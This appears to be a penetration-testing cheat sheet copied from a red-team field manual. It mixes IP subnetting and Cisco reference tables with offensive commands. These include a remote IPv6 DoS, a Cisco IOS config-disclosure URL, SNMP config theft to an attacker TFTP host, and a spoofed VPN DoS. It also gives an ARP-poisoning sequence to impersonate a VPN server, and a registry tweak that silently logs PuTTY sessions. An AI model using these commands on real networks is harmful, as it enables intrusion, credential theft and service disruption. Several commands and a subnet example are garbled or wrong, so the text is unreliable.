IPv4
CLASSFUL IP RANGES
| A | 0.0.0.0 - 127.255.255.255 |
| B | 128.0.0.0 - 191.255.255.255 |
| C | 192.0.0.0 - 223.255.255.255 |
| D | 224.0.0.0 - 239.255.255.255 |
| E | 240.0.0.0 - 255.255.255.255 |
RESERVED RANGES
10.0.0.0 - 10.255.255.255
127.0.0.0 - 127.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
SUBNETTING
| /31 | 255.255.255.254 | 1 Host |
| /30 | 255.255.255.252 | 2 Hosts |
| /29 | 255.255.255.248 | 6 Hosts |
| /28 | 255.255.255.240 | 14 Hosts |
| /27 | 255.255.255.224 | 30 Hosts |
| /26 | 255.255.255.192 | 62 Hosts |
| /25 | 255.255.255.128 | 126 Hosts |
| /24 | 255.255.255.0 | 254 Hosts |
| /23 | 255.255.254.0 | 510 Hosts |
| /22 | 255.255.252.0 | 1,022 Hosts |
| /21 | 255.255.248.0 | 2,046 Hosts |
| /20 | 255.255.240.0 | 4,094 Hosts |
| /19 | 255.255.224.0 | 8,190 Hosts |
| /18 | 255.255.192.0 | 16,382 Hosts |
| /17 | 255.255.128.0 | 32,766 Hosts |
| /16 | 255.255.0.0 | 65,534 Hosts |
| /15 | 255.254.0.0 | 131,070 Hosts |
| /14 | 255.252.0.0 | 262,142 Hosts |
| /13 | 255.248.0.0 | 524,286 Hosts |
| /12 | 255.240.0.0 | 1,048,574 Hosts |
| /11 | 255.224.0.0 | 2,097,150 Hosts |
| /10 | 255.192.0.0 | 4,194,302 Hosts |
| /9 | 255.128.0.0 | 8,388,606 Hosts |
| /8 | 255.0.0.0 | 16,777,214 Hosts |
CALCULATING SUBNET RANGE
Given: 1.1.1.101/28
✓ /28 = 255.255.255.240 netmask
✓ 256 - 240 = 16 = subnet ranges of 16, i.e.
1.1.1.0
1.1.1.16
1.1.1.32...
✓ Range where given 12 falls: 1.1.1.96 - 1.1.1.111
Top -
Home
IPv6
BROADCAST ADDRESSES
ff02::1 - link-local nodes
ff05::1 - site-local nodes
ff01::2 - node-local routers
ff02::2 - link-local routers
ff05::2 - site-local routers
INTERFACE ADDRESSES
fe80:: - link-local
2001:: - routable
::a.b.c.d - IPv4 compatible IPv6
::ffff:a.b.c.d - IPv4 mapped IPv6
THC IPv6 TOOLKIT
Remote Network DoS:
> rsumrf6 eth# <remote ipv6>
SOCAT TUNNEL IPv6 THROUGH IPv4 TOOLS
> socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[2001::]:80
> ./nikto.pl -host 127.0.0.1 -port 8080
Top -
Home
Cisco Commands
| >enable | Enter privilege mode |
| #configure terminal | Configure interface |
| (config)#interface fa0/0 | Configure FastEthernet 0/0 |
| (config-if)#ip addr 1.1.1.1 255.255.255.0 | Add IP to fa0/0 |
| (config)#line vty 0 4 | Configure vty line |
| (config-line)#login | 1. Set telnet password |
| (config-line)#password <password> | 2. Set telnet password |
| #show session | Open sessions |
| #show version | IOS version |
| #dir file systems | Available files |
| #dir all-filesystems | File information |
| #dir /all | Deleted files |
| #show running-config | Config loaded in mem |
| #show startup-config | Config loaded at boot |
| #show ip interface brief | Interfaces |
| #show interface e0 | Detailed interface info |
| #show ip route | Routes |
| #show access-lists | Access lists |
| #terminal length 0 | No limit on output |
| #copy running-config startup-config | Replace run w/ start config |
| #copy running-config tftp | Copy run config to TFTP Svr |
Cisco IOS 11.2-12.2 VULNERABILITY
http://<ip>/level/<16-99>/exec/show/config
Top -
Home
SNMP
MUST START TFTP SERVER 1ST
./snmpblow.pl -s <srcipt> -d <rtr_ip> -t <attackerip> -f out.txt < snmpstrings.txt
WINDOWS RUNNING SERVICES:
> snmpwalk -c public -v1 <ip> 1 |grep hrSWRunName Icut -d" " -f4
WINDOWS OPEN TCP PORTS :
> smpwalk ... |grep tcpConnState |cut -d" " -f6 |sort -u
WINDOWS INSTALLED SOFTWARE :
> smpwalk ... |grep hrSWlnstalledName
WINDOWS USERS :
> snmpwalk ... <ip> 1.3 |grep 77.1.2.25 -f4
Top -
Home
Packet Capturing
CAPTURE TCP TRAFFIC ON PORT 22-23
> tcpdump -nvvX -s0 -i eth0 tcp portrange 22-23
CAPTURE TRAFFIC TO SPECIFIC IP EXCLUDING SPECIFIC SUBNET
> tcpdump -I eth0 -tttt dst <ip> and not net 1.1.1.0/24
CAPTURE TRAFFIC B/W LOCAL-192.1
> tcpdump net 192.1.1
CAPTURE TRAFFIC FOR <SEC> SECONDS
> dumpcap -I eth0 -a duration:<sec> -w file <file.pcap>
REPLAY PCAP
> file2cable eth0 -f file.pcap
REPLAY PACKETS (FUZZ I DOS)
> tcpreplay --topspeed --loop=0 --intf=eth0 <.pcap_file_to_replay> -- mbps=10|100|1000
Top -
Home
DNS
DNSRECON
Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Retrieve standard DNS records:
./dnsrecon.rb -t std -d domain.com
Enumerate subdomains:
./dnsrecon.rb -t brt -d domain.com -w hosts.txt
DNS zone transfer:
./dnsrecon -d domain.com -t axfr
NMAP REVERSE DNS LOOKUP AND OUTPUT PARSER
nmap -R -sL -Pn -dns-servers <dns svr ip> <range> | awk '{if(($1" "$2" "$3)=="Nmap scan
report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' > dns.txt
Top -
Home
VPN
WRITE PSK TO FILE
> ike-scan -M -A <vpn ip> -P<file>
DoS VPN SERVER
> ike-scan -A -t 1 --sourceip=<spoof_ip> <dst_ip>
FIKED - FAKE VPN SERVER
✓ Must know the VPN group name and pre-shared key
1.
Ettercap filter to drop IPSEC traffic (UDP port 500)
if(ip.proto == UDP && udp.src == 500){
kill();
drop();
msg("*****UDP packet dropped*****");
}
2. <
Compile filter
> etterfilter udpdrop.filter -o udpdrop.ef
3.
Start Ettercap and drop all IPSEC traffic
#ettercap -T -q -M arp -F udpdrop.ef // //
4.
Enable IP Forward
> echo "1" > /proc/sys/net/ipv4/ip_forward
5.
Configure IPtables to port forward to Fiked server
> iptables -t nat -A PREROUTING -p udp -I eth0 -d <VPN Server 1p>
DNAT - - to <Attacking Host IP>
> iptables -P FORWARD ACCEPT
6.
Start Fiked to impersonate the VPN Server
> fiked - g <vpn gateway ip> - k <VPN Group Name:Group Pre-Shared Key>
7.
Stop Ettercap
8.
Restart Ettercap without the filter
> ettercap -T -M arp // //
Top -
Home
Putty
REG KEY TO HAVE PUTTY LOG EVERYTHING ( INCLUDING CONVERSATIONS)
[HKEY_CURRENT_USER\Software\SimonTatham\Putty\Sessions\Default%20Settings]
"LogFileName"="%TEMP%\putty.dat"
"LogType"=dword:00000002"
Top -
Home